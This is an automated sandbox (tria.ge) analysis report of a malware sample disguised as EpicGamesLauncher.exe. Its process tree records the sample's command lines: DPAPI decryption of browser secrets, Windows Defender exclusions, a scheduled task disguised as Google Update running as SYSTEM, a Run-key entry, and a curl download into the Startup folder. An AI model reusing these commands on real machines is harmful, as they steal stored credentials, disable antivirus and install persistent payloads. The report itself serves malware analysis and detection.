Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    90s
  • max time network
    125s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/01/2024, 18:28

General

  • Target

    EpicGamesLauncher.exe

  • Size

    154.9MB

  • MD5

    928282456673e0a194360f9d411f165d

  • SHA1

    9820bd055f95d157fdbdc973bfc955c282a18c29

  • SHA256

    5088d3e4c0b15af2cdd00ab98ca1cdd273cce489b7ac610d4ddda1f1f8154b82

  • SHA512

    c71623dd5396c89bf3d163451cb0c47d26181d4e4136c041cc888c78ef770d944a64c505efdbbe94bd09456c5b072845f98d3e5b3bcf68075cacb6bd1dfc1753

  • SSDEEP

    1572864:HCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:nDAgZi

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 40 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe
    "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4944
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1576
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:1248
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /f"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2384
      • C:\Windows\system32\reg.exe
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /f
        3⤵
          PID:4792
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,93,5,165,72,158,86,199,78,170,107,57,171,8,49,161,31,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,192,175,247,102,90,208,4,240,138,90,143,203,80,163,0,13,49,15,225,91,73,243,187,128,250,106,67,220,20,183,238,93,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,202,130,214,178,63,66,10,90,87,20,232,137,138,62,39,164,64,195,193,57,56,16,94,10,230,88,187,206,60,90,135,206,48,0,0,0,124,8,92,113,89,139,235,23,157,133,234,106,177,79,59,186,142,56,17,66,139,112,64,187,31,220,20,216,138,203,176,248,155,15,237,54,185,55,80,119,224,28,129,247,27,19,158,217,64,0,0,0,214,161,169,216,58,203,9,234,138,90,200,179,105,214,227,237,175,233,155,102,99,3,231,126,196,36,170,165,135,39,43,83,255,43,212,63,42,214,50,45,28,119,231,156,71,234,111,148,255,235,64,215,246,231,45,220,57,205,160,239,28,51,231,37), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2600
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,93,5,165,72,158,86,199,78,170,107,57,171,8,49,161,31,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,192,175,247,102,90,208,4,240,138,90,143,203,80,163,0,13,49,15,225,91,73,243,187,128,250,106,67,220,20,183,238,93,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,202,130,214,178,63,66,10,90,87,20,232,137,138,62,39,164,64,195,193,57,56,16,94,10,230,88,187,206,60,90,135,206,48,0,0,0,124,8,92,113,89,139,235,23,157,133,234,106,177,79,59,186,142,56,17,66,139,112,64,187,31,220,20,216,138,203,176,248,155,15,237,54,185,55,80,119,224,28,129,247,27,19,158,217,64,0,0,0,214,161,169,216,58,203,9,234,138,90,200,179,105,214,227,237,175,233,155,102,99,3,231,126,196,36,170,165,135,39,43,83,255,43,212,63,42,214,50,45,28,119,231,156,71,234,111,148,255,235,64,215,246,231,45,220,57,205,160,239,28,51,231,37), $null, 'CurrentUser')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4632
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4960
        • C:\Windows\system32\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4248
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,93,5,165,72,158,86,199,78,170,107,57,171,8,49,161,31,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,186,255,119,95,163,32,239,108,241,228,171,185,238,69,126,164,58,126,252,186,104,78,252,226,40,240,40,209,84,31,141,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,233,221,103,215,54,135,208,118,201,165,218,71,27,56,205,159,34,193,41,61,232,44,48,86,184,49,132,90,67,155,86,48,0,0,0,93,244,22,199,209,170,222,110,51,245,0,12,158,51,30,191,109,181,10,191,62,213,224,84,172,143,91,96,138,43,155,187,239,7,96,73,207,215,195,250,17,109,171,171,61,181,203,188,64,0,0,0,21,78,251,21,120,144,110,104,151,213,255,237,240,17,18,169,145,25,76,140,241,245,213,152,38,92,79,109,232,124,151,242,197,236,225,74,118,208,79,241,16,17,138,83,248,139,175,197,196,59,108,108,126,58,76,32,112,117,159,82,178,232,154,135), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:3716
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,93,5,165,72,158,86,199,78,170,107,57,171,8,49,161,31,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,186,255,119,95,163,32,239,108,241,228,171,185,238,69,126,164,58,126,252,186,104,78,252,226,40,240,40,209,84,31,141,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,233,221,103,215,54,135,208,118,201,165,218,71,27,56,205,159,34,193,41,61,232,44,48,86,184,49,132,90,67,155,86,48,0,0,0,93,244,22,199,209,170,222,110,51,245,0,12,158,51,30,191,109,181,10,191,62,213,224,84,172,143,91,96,138,43,155,187,239,7,96,73,207,215,195,250,17,109,171,171,61,181,203,188,64,0,0,0,21,78,251,21,120,144,110,104,151,213,255,237,240,17,18,169,145,25,76,140,241,245,213,152,38,92,79,109,232,124,151,242,197,236,225,74,118,208,79,241,16,17,138,83,248,139,175,197,196,59,108,108,126,58,76,32,112,117,159,82,178,232,154,135), $null, 'CurrentUser')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4468
      • C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe
        "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\EpicGamesLauncher" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1792 --field-trial-handle=1920,i,15820112774290457853,11478009095939111221,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        2⤵
          PID:3168
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2672
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "cscript //B //nologo "C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4504
          • C:\Windows\system32\cscript.exe
            cscript //B //nologo "C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs"
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:3288
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\CheckEpicGamesLauncher.bat" "
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2464
              • C:\Windows\system32\reg.exe
                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "EpicGamesLauncher" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe" /f
                5⤵
                • Adds Run key to start application
                • Modifies registry key
                PID:2764
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1456
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exemple.exe""
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1220
              • C:\Windows\system32\reg.exe
                reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "EpicGamesLauncher"
                5⤵
                • Modifies registry key
                PID:3684
              • C:\Windows\system32\curl.exe
                curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exemple.exe" YOUR-DIRECT-DOWNLOAD-HERE
                5⤵
                  PID:224
          • C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe
            "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\EpicGamesLauncher" --mojo-platform-channel-handle=2108 --field-trial-handle=1920,i,15820112774290457853,11478009095939111221,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
            2⤵
              PID:4996
          • C:\Windows\system32\schtasks.exe
            schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
            1⤵
            • Creates scheduled task(s)
            PID:4340

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            3KB

            MD5

            f48896adf9a23882050cdff97f610a7f

            SHA1

            4c5a610df62834d43f470cae7e851946530e3086

            SHA256

            3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78

            SHA512

            16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            c428399b96e965ae61cee1ba767fd9d9

            SHA1

            8964316b735c23fca792ba85354eacdd8dbb5e35

            SHA256

            14053c0f27a0c695462fad737c6b0c9810dce4472835977e9f08bca3ef0f7462

            SHA512

            5ef32b49b638dca1e5e4adf3c1823a23735c6539d06092e46bdbf97f23b2e4201455ab5e01a019167cd0c80865411ea4fb1e67cc25a3bb58989834a7a34956f7

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            f0314381ee333795efb86f015c87b7c7

            SHA1

            d70a44581617e6201726846a23fc71b769cc46da

            SHA256

            4f5459942b4bf6f19cd373079bd58e2796c94fd3393f77376170fd39e39e37d1

            SHA512

            56c6074e7e5604e1c76cc147e9d0811195070b01d1979cd620e37bc636a6be3a36f25f3c48ede403f0a4a359b5693ccef9d222a7814fe5cc658c70d732295099

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B

            MD5

            353510dff0bdd241051e5b066ea0d884

            SHA1

            a84ea8d61e491d654fa3265cd5fe31bf2737c1c2

            SHA256

            aae6f17564f0d5bb849dfac3faf237f3c6dd5aa2b8adc888d2c2dd6ce58fe33a

            SHA512

            bb6d9c993e93dd816adb0f1ff73a92219823419251acb1cbad626fa8c5070e94b1dd5f1fb77e58bb946e66a2ab4997474fd1a985fb1ba92321def7d8abe4bcd1

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c1lellvw.pfn.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\a3f723c4-926a-4e06-bd51-fbce19d82b52.tmp.node

            Filesize

            1.8MB

            MD5

            3072b68e3c226aff39e6782d025f25a8

            SHA1

            cf559196d74fa490ac8ce192db222c9f5c5a006a

            SHA256

            7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01

            SHA512

            61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

          • C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\CheckEpicGamesLauncher.bat

            Filesize

            1KB

            MD5

            c18c10cb23ca6e5490be6eb2fb1a1ddc

            SHA1

            4a3082ddd4851da7db0b8527c31b2ba23877c011

            SHA256

            a58332b95f300a9b5d1309bfc18e5b97b59c1b94145064aeedaf6e9718022b9d

            SHA512

            537462aebe04acd652f310c684b2b562d72665f2b379b830ff15f069603f3ff0229ea65504f0e53f3cb983eeae1de01c4c0518281fe31cef5a890eecc4e2b1bb

          • C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs

            Filesize

            167B

            MD5

            323e6511a0f7e82c511ea954d1530b13

            SHA1

            8b167e573b0663d1bc5a60f0d7b3f267f0bc1a20

            SHA256

            48a92c93fb07c8f059e0622ce2a95e32726d02fcb23f7bfb384374e636518597

            SHA512

            757163f84f9352bef973c6a7a994dc4a8492d224820ca5c86e572ed67b3bbe6049444d2a07b08c9efd4bb59b9e5e52ba3fdd397f01f55ddfcf3a5ae3d07ebf6a

          • memory/1220-84-0x00000276666C0000-0x00000276666D0000-memory.dmp

            Filesize

            64KB

          • memory/1220-83-0x00000276666C0000-0x00000276666D0000-memory.dmp

            Filesize

            64KB

          • memory/1220-82-0x00007FF906850000-0x00007FF907311000-memory.dmp

            Filesize

            10.8MB

          • memory/1220-86-0x00007FF906850000-0x00007FF907311000-memory.dmp

            Filesize

            10.8MB

          • memory/1456-71-0x00007FF906850000-0x00007FF907311000-memory.dmp

            Filesize

            10.8MB

          • memory/1456-68-0x0000025A2DA40000-0x0000025A2DA50000-memory.dmp

            Filesize

            64KB

          • memory/1456-69-0x0000025A2DA40000-0x0000025A2DA50000-memory.dmp

            Filesize

            64KB

          • memory/1456-67-0x00007FF906850000-0x00007FF907311000-memory.dmp

            Filesize

            10.8MB

          • memory/4468-35-0x00007FF907FE0000-0x00007FF908AA1000-memory.dmp

            Filesize

            10.8MB

          • memory/4468-41-0x00007FF907FE0000-0x00007FF908AA1000-memory.dmp

            Filesize

            10.8MB

          • memory/4468-36-0x000001FD9EC30000-0x000001FD9EC40000-memory.dmp

            Filesize

            64KB

          • memory/4468-37-0x000001FD9EC30000-0x000001FD9EC40000-memory.dmp

            Filesize

            64KB

          • memory/4632-23-0x00007FF908330000-0x00007FF908DF1000-memory.dmp

            Filesize

            10.8MB

          • memory/4632-19-0x0000017079D50000-0x0000017079DA0000-memory.dmp

            Filesize

            320KB

          • memory/4632-18-0x0000017077890000-0x00000170778A0000-memory.dmp

            Filesize

            64KB

          • memory/4632-17-0x0000017077890000-0x00000170778A0000-memory.dmp

            Filesize

            64KB

          • memory/4632-16-0x00007FF908330000-0x00007FF908DF1000-memory.dmp

            Filesize

            10.8MB

          • memory/4632-6-0x000001705F340000-0x000001705F362000-memory.dmp

            Filesize

            136KB